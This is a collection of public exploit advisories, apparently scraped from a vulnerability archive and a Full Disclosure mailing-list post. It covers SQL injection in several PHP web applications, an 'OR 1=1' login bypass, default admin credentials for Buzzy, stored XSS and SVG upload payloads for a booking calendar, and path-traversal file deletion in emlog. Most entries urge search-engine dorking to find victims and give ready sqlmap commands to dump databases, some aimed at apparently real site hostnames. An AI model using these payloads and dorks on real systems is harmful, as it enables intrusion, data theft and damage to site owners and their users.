B-OBEC version V.092019 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : B-OBEC V.092019 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://bobec.bopp-obec.info/                                                                                      |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /area_user.php?Area_CODE=1001[+] D:\sqlmap>sqlmap.py -u https://target_site/area_user.php?Area_CODE=1001 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbsGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

B-OBEC V.092019 SQL Injection

BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BMIT BMS 2.1 Auth BY Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.bmitsolution.in/softtware_development.php                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/wwrbsgroupofinstitutioncom/admin/index.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

BMIT BMS 2.1 SQL Injection

AMSS++ version 5.21.09 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMSS++ V5.21.09 JT SQL injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_full_update_5_21.rar                                         |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules/mail/main/maildetail.php?id=174 <===== inject here D:\sqlmap>sqlmap.py -u https://127.0.0.1/amss.ictkan2com/modules/mail/main/maildetail.php?id=174 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D admin_amssGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMSS++ 5.21.09 SQL Injection

AMS Logistics version 2.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMS LOGISTICS 2.2 SQL injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.amslogistics.co.th/#software                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /ai_news_read.php?l_id=AMS23050001 <===== inject here [+] https://127.0.0.1/wtheailogisticscom/ai_news_read.php?l_id=AMS23050001Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMS Logistics 2.2 SQL Injection

Aicte India LMS version 3.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Aicte india LMS 3.0 SQL injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /committee.php?n=ANTI-RAGGING <===== inject here [+] D:\sqlmap>sqlmap.py -u http://vtcbcsreduin/committee.php?n=ANTI-RAGGING  --tables -D vcbtanyb_auctionGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Aicte India LMS 3.0 SQL Injection

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

Posted Jul 27, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 5ed91b51bdf7efaa67ae9bf7fba6a1066c2ab71217d47b8a8ad0b9d7d469dbaa

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.5.1 Insecure Settings Vulnerability                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                              || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,789)
*   Arbitrary (16,166)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,025)
*   Code Execution (7,248)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,383)
*   Encryption (2,365)
*   Exploit (51,681)
*   File Inclusion (4,215)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,758)
*   Intrusion Detection (891)
*   Java (3,037)
*   JavaScript (851)
*   Kernel (6,656)
*   Local (14,442)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,140)
*   Proof of Concept (2,338)
*   Protocol (3,584)
*   Python (1,531)
*   Remote (30,691)
*   Root (3,577)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,878)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,324)
*   TCP (2,398)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,727)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,882)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,797)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,284)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,612)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,780)
*   UNIX (9,271)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings

A vulnerability, which was classified as problematic, was found in GZ Scripts Availability Booking Calendar PHP 1.0. This affects an unknown part of the file /index.php?controller=GzUser&action=edit&id=1 of the component Image Handler. The manipulation of the argument img leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235569 was assigned to this vulnerability.

**Full Disclosure mailing list archives****Availability Booking Calendar PHP - Stored XSS and Unrestricted File Upload**

_From_: Andrey Stoykov <mwebsec () gmail com>  
_Date_: Sat, 22 Jul 2023 22:39:05 +0300  

\# Exploit Title: Availability Booking Calendar PHP - Multiple Issues
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Tested on: Ubuntu 20.04
# Blog: http://msecureltd.blogspot.com

XSS #1:

Steps to Reproduce:

1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(\`XSS\`)</script>


// HTTP POST request

POST
/AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit
HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
\[...\]

\[...\]
edit\_booking=1&calendars\_price=900&extra\_price=0&tax=10&deposit=91&promo\_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create\_booking=1
\[...\]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
\[...\]



// HTTP GET request to Bookings page

GET
/AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2
HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
\[...\]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
\[...\]

\[...\]
<label class="control-label" for="promo\_code">Promo code:</label>
            <input id="promo\_code" class="form-control input-sm"
type="text" name="promo\_code" size="25"
value="TEST"><script>alert(\`XSS\`)</script>" title="Promo code"
placeholder="">
        </div>
\[...\]



Unrestricted File Upload #1:


// SVG file contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg";>
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert(\`XSS\`);
   </script>
</svg>


Steps to Reproduce:

1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab


// HTTP POST request

POST
/AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1
HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
\[...\]

\[...\]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg";>
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert(\`XSS\`);
   </script>
</svg>
\[...\]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
\[...\]
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Availability Booking Calendar PHP - Stored XSS and Unrestricted File Upload** _Andrey Stoykov (Jul 25)_

CVE-2023-3970: Full Disclosure: Availability Booking Calendar PHP

Journal Management Software version 1.2.4 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Journal Management Software V1.2.4 Sql injection                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://asanhamayesh.com/                                                                                           |  | # Dork      : Designer Asan Journal (Journal Management Software) Ver. 1.2.4                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://wwwjoavmcom/en/action.php?issue=1 <===== inject here[+] Panel : http://wwwjoavmcom/en/signin.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Journal Management Software 1.2.4 SQL Injection

Joomla VirtueMart component version 2.6.12.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Joomla VirtueMart v2.6.12.2 SQL Injection Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://dev.virtuemart.net/attachments/863/com_virtuemart.2.6.12.2.zip                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : index.php/headgear/results,1-60?filter_product=1[+] http://127.0.0.1/Virtue/index.php/headgear/results,1-60?filter_product=1 = inject her[+] http://127.0.0.1/Virtue/administrator/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Joomla VirtueMart 2.6.12.2 SQL Injection

emlog 2.1.9 is vulnerable to Arbitrary file deletion via admin\template.php.

First log in to the home page of the background using the administrator account  
Open the admin\\template.php template

**../../hello.txt** This location is the root directory file to be deleted

poc:  
GET /emlog/admin/template.php?action=del&tpl=**../../hello.txt**&token=c5bc68077f6da2a911df58e6cde92cbc2d0514fd HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Referer: http://127.0.0.1/emlog/admin/template.php  
Cookie: PHPSESSID=kqfrmmnndterp04rl0cv9ls613; EM\_AUTHCOOKIE\_RNrgNg46hg86lUoT8Hg8Vht92Y3yU9rn=123123%7C0%7Cf98ccd4c0c66a0922a0e077a24088ba0  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

Tag

#firefox